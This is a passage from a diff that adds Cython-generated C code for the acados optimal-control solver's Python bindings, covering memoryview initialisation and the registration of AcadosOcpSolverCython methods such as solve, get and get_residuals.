PyThread_allocate_lock(), + * PyThread_allocate_lock(), + */ + __pyx_t_8[0] = PyThread_allocate_lock(); + __pyx_t_8[1] = PyThread_allocate_lock(); + __pyx_t_8[2] = PyThread_allocate_lock(); + __pyx_t_8[3] = PyThread_allocate_lock(); + __pyx_t_8[4] = PyThread_allocate_lock(); + __pyx_t_8[5] = PyThread_allocate_lock(); + __pyx_t_8[6] = PyThread_allocate_lock(); + __pyx_t_8[7] = PyThread_allocate_lock(); + memcpy(&(__pyx_memoryview_thread_locks[0]), __pyx_t_8, sizeof(__pyx_memoryview_thread_locks[0]) * (8)); + + /* "View.MemoryView":982 + * + * + * try: # <<<<<<<<<<<<<< + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_2, &__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + /*try:*/ { + + /* "View.MemoryView":983 + * + * try: + * count = __pyx_collections_abc_Sequence.count # <<<<<<<<<<<<<< + * index = __pyx_collections_abc_Sequence.index + * except: + */ + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_count); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 983, __pyx_L17_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_memoryviewslice_type->tp_dict, __pyx_n_s_count, __pyx_t_7) < 0) __PYX_ERR(1, 983, __pyx_L17_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_memoryviewslice_type); + + /* "View.MemoryView":984 + * try: + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index # <<<<<<<<<<<<<< + * except: + * pass + */ + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_index); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 984, __pyx_L17_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_memoryviewslice_type->tp_dict, __pyx_n_s_index, __pyx_t_7) < 0) __PYX_ERR(1, 984, __pyx_L17_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_memoryviewslice_type); + + /* "View.MemoryView":982 + * + * + * try: # <<<<<<<<<<<<<< + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + */ + } + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + goto __pyx_L22_try_end; + __pyx_L17_error:; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "View.MemoryView":985 + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + * except: # <<<<<<<<<<<<<< + * pass + * + */ + /*except:*/ { + __Pyx_ErrRestore(0,0,0); + goto __pyx_L18_exception_handled; + } + __pyx_L18_exception_handled:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + __pyx_L22_try_end:; + } + + /* "View.MemoryView":988 + * pass + * + * try: # <<<<<<<<<<<<<< + * if __pyx_collections_abc_Sequence: + * + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_3, &__pyx_t_2, &__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_1); + /*try:*/ { + + /* "View.MemoryView":989 + * + * try: + * if __pyx_collections_abc_Sequence: # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_6 = __Pyx_PyObject_IsTrue(__pyx_collections_abc_Sequence); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(1, 989, __pyx_L23_error) + if (__pyx_t_6) { + + /* "View.MemoryView":993 + * + * + * __pyx_collections_abc_Sequence.register(_memoryviewslice) # <<<<<<<<<<<<<< + * __pyx_collections_abc_Sequence.register(array) + * except: + */ + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_register); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 993, __pyx_L23_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_4 = __Pyx_PyObject_CallOneArg(__pyx_t_7, ((PyObject *)__pyx_memoryviewslice_type)); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 993, __pyx_L23_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "View.MemoryView":994 + * + * __pyx_collections_abc_Sequence.register(_memoryviewslice) + * __pyx_collections_abc_Sequence.register(array) # <<<<<<<<<<<<<< + * except: + * pass # ignore failure, it's a minor issue + */ + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_register); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 994, __pyx_L23_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_7 = __Pyx_PyObject_CallOneArg(__pyx_t_4, ((PyObject *)__pyx_array_type)); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 994, __pyx_L23_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "View.MemoryView":989 + * + * try: + * if __pyx_collections_abc_Sequence: # <<<<<<<<<<<<<< + * + * + */ + } + + /* "View.MemoryView":988 + * pass + * + * try: # <<<<<<<<<<<<<< + * if __pyx_collections_abc_Sequence: + * + */ + } + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + goto __pyx_L28_try_end; + __pyx_L23_error:; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "View.MemoryView":995 + * __pyx_collections_abc_Sequence.register(_memoryviewslice) + * __pyx_collections_abc_Sequence.register(array) + * except: # <<<<<<<<<<<<<< + * pass # ignore failure, it's a minor issue + * + */ + /*except:*/ { + __Pyx_ErrRestore(0,0,0); + goto __pyx_L24_exception_handled; + } + __pyx_L24_exception_handled:; + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_ExceptionReset(__pyx_t_3, __pyx_t_2, __pyx_t_1); + __pyx_L28_try_end:; + } + + /* "(tree fragment)":1 + * def __pyx_unpickle_Enum(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + __pyx_t_7 = PyCFunction_NewEx(&__pyx_mdef_15View_dot_MemoryView_1__pyx_unpickle_Enum, NULL, __pyx_n_s_View_MemoryView); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_pyx_unpickle_Enum, __pyx_t_7) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":47 + * cimport numpy as cnp + * + * import os # <<<<<<<<<<<<<< + * from datetime import datetime + * import numpy as np + */ + __pyx_t_7 = __Pyx_ImportDottedModule(__pyx_n_s_os, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 47, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_os, __pyx_t_7) < 0) __PYX_ERR(0, 47, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":48 + * + * import os + * from datetime import datetime # <<<<<<<<<<<<<< + * import numpy as np + * + */ + __pyx_t_7 = PyList_New(1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 48, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_INCREF(__pyx_n_s_datetime); + __Pyx_GIVEREF(__pyx_n_s_datetime); + PyList_SET_ITEM(__pyx_t_7, 0, __pyx_n_s_datetime); + __pyx_t_4 = __Pyx_Import(__pyx_n_s_datetime, __pyx_t_7, 0); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 48, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __pyx_t_7 = __Pyx_ImportFrom(__pyx_t_4, __pyx_n_s_datetime); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 48, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_datetime, __pyx_t_7) < 0) __PYX_ERR(0, 48, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":49 + * import os + * from datetime import datetime + * import numpy as np # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_4 = __Pyx_ImportDottedModule(__pyx_n_s_numpy, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 49, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_np, __pyx_t_4) < 0) __PYX_ERR(0, 49, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":94 + * + * + * def __get_pointers_solver(self): # <<<<<<<<<<<<<< + * """ + * Private function to get the pointers for solver + */ + __pyx_t_4 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_3_AcadosOcpSolverCython__get_pointers_solver, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython___get_poin, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__42)); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 94, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_AcadosOcpSolverCython__get_poin, __pyx_t_4) < 0) __PYX_ERR(0, 94, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":108 + * + * + * def solve(self): # <<<<<<<<<<<<<< + * """ + * Solve the ocp with current input. + */ + __pyx_t_4 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_5solve, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_solve, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__43)); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 108, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_solve, __pyx_t_4) < 0) __PYX_ERR(0, 108, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":115 + * + * + * def reset(self): # <<<<<<<<<<<<<< + * """ + * Sets current iterate to all zeros. + */ + __pyx_t_4 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_7reset, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_reset, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__44)); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 115, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_reset, __pyx_t_4) < 0) __PYX_ERR(0, 115, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":122 + * + * + * def set_new_time_steps(self, new_time_steps): # <<<<<<<<<<<<<< + * """ + * Set new time steps. + */ + __pyx_t_4 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_9set_new_time_steps, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_set_new_ti, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__46)); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 122, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_set_new_time_steps, __pyx_t_4) < 0) __PYX_ERR(0, 122, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":173 + * + * + * def update_qp_solver_cond_N(self, qp_solver_cond_N: int): # <<<<<<<<<<<<<< + * """ + * Recreate solver with new value `qp_solver_cond_N` with a partial condensing QP solver. + */ + __pyx_t_4 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 173, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem(__pyx_t_4, __pyx_n_s_qp_solver_cond_N, __pyx_n_s_int) < 0) __PYX_ERR(0, 173, __pyx_L1_error) + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_11update_qp_solver_cond_N, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_update_qp, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__48)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 173, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_CyFunction_SetAnnotationsDict(__pyx_t_7, __pyx_t_4); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_update_qp_solver_cond_N, __pyx_t_7) < 0) __PYX_ERR(0, 173, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":207 + * + * + * def eval_param_sens(self, index, stage=0, field="ex"): # <<<<<<<<<<<<<< + * """ + * Calculate the sensitivity of the curent solution with respect to the initial state component of index + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_13eval_param_sens, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_eval_param_3, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__50)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 207, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_7, __pyx_tuple__51); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_eval_param_sens, __pyx_t_7) < 0) __PYX_ERR(0, 207, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":232 + * + * + * def get(self, int stage, str field_): # <<<<<<<<<<<<<< + * """ + * Get the last solution of the solver: + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_15get, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_get, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__53)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 232, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_get, __pyx_t_7) < 0) __PYX_ERR(0, 232, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":275 + * + * + * def print_statistics(self): # <<<<<<<<<<<<<< + * """ + * prints statistics of previous solver run as a table: + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_17print_statistics, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_print_stat, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__54)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 275, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_print_statistics, __pyx_t_7) < 0) __PYX_ERR(0, 275, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":293 + * + * + * def store_iterate(self, filename='', overwrite=False): # <<<<<<<<<<<<<< + * """ + * Stores the current iterate of the ocp solver in a json file. + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_19store_iterate, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_store_iter, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__56)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 293, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_7, __pyx_tuple__57); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_store_iterate, __pyx_t_7) < 0) __PYX_ERR(0, 293, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":330 + * + * + * def load_iterate(self, filename): # <<<<<<<<<<<<<< + * """ + * Loads the iterate stored in json file with filename into the ocp solver. + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_21load_iterate, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_load_itera, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__59)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 330, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_load_iterate, __pyx_t_7) < 0) __PYX_ERR(0, 330, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":346 + * + * + * def get_stats(self, field_): # <<<<<<<<<<<<<< + * """ + * Get the information of the last solver call. + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_23get_stats, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_get_stats, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__61)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 346, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_get_stats, __pyx_t_7) < 0) __PYX_ERR(0, 346, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":428 + * + * + * def __get_stat_int(self, field): # <<<<<<<<<<<<<< + * cdef int out + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &out) + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_25_AcadosOcpSolverCython__get_stat_int, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython___get_stat, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__63)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 428, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_AcadosOcpSolverCython__get_stat, __pyx_t_7) < 0) __PYX_ERR(0, 428, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":433 + * return out + * + * def __get_stat_double(self, field): # <<<<<<<<<<<<<< + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((1,)) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out.data) + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_27_AcadosOcpSolverCython__get_stat_double, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython___get_stat_2, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__64)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 433, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_AcadosOcpSolverCython__get_stat_2, __pyx_t_7) < 0) __PYX_ERR(0, 433, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":438 + * return out + * + * def __get_stat_matrix(self, field, n, m): # <<<<<<<<<<<<<< + * cdef cnp.ndarray[cnp.float64_t, ndim=2] out_mat = np.ascontiguousarray(np.zeros((n, m)), dtype=np.float64) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out_mat.data) + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_29_AcadosOcpSolverCython__get_stat_matrix, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython___get_stat_3, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__66)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 438, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_AcadosOcpSolverCython__get_stat_3, __pyx_t_7) < 0) __PYX_ERR(0, 438, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":444 + * + * + * def get_cost(self): # <<<<<<<<<<<<<< + * """ + * Returns the cost value of the current solution. + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_31get_cost, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_get_cost, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__68)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 444, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_get_cost, __pyx_t_7) < 0) __PYX_ERR(0, 444, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":460 + * + * + * def get_residuals(self, recompute=False): # <<<<<<<<<<<<<< + * """ + * Returns an array of the form [res_stat, res_eq, res_ineq, res_comp]. + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_33get_residuals, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_get_residu, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__70)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 460, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_7, __pyx_tuple__71); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_get_residuals, __pyx_t_7) < 0) __PYX_ERR(0, 460, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":492 + * + * # Note: this function should not be used anymore, better use cost_set, constraints_set + * def set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * + * """ + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_35set, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_set, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__73)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 492, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if 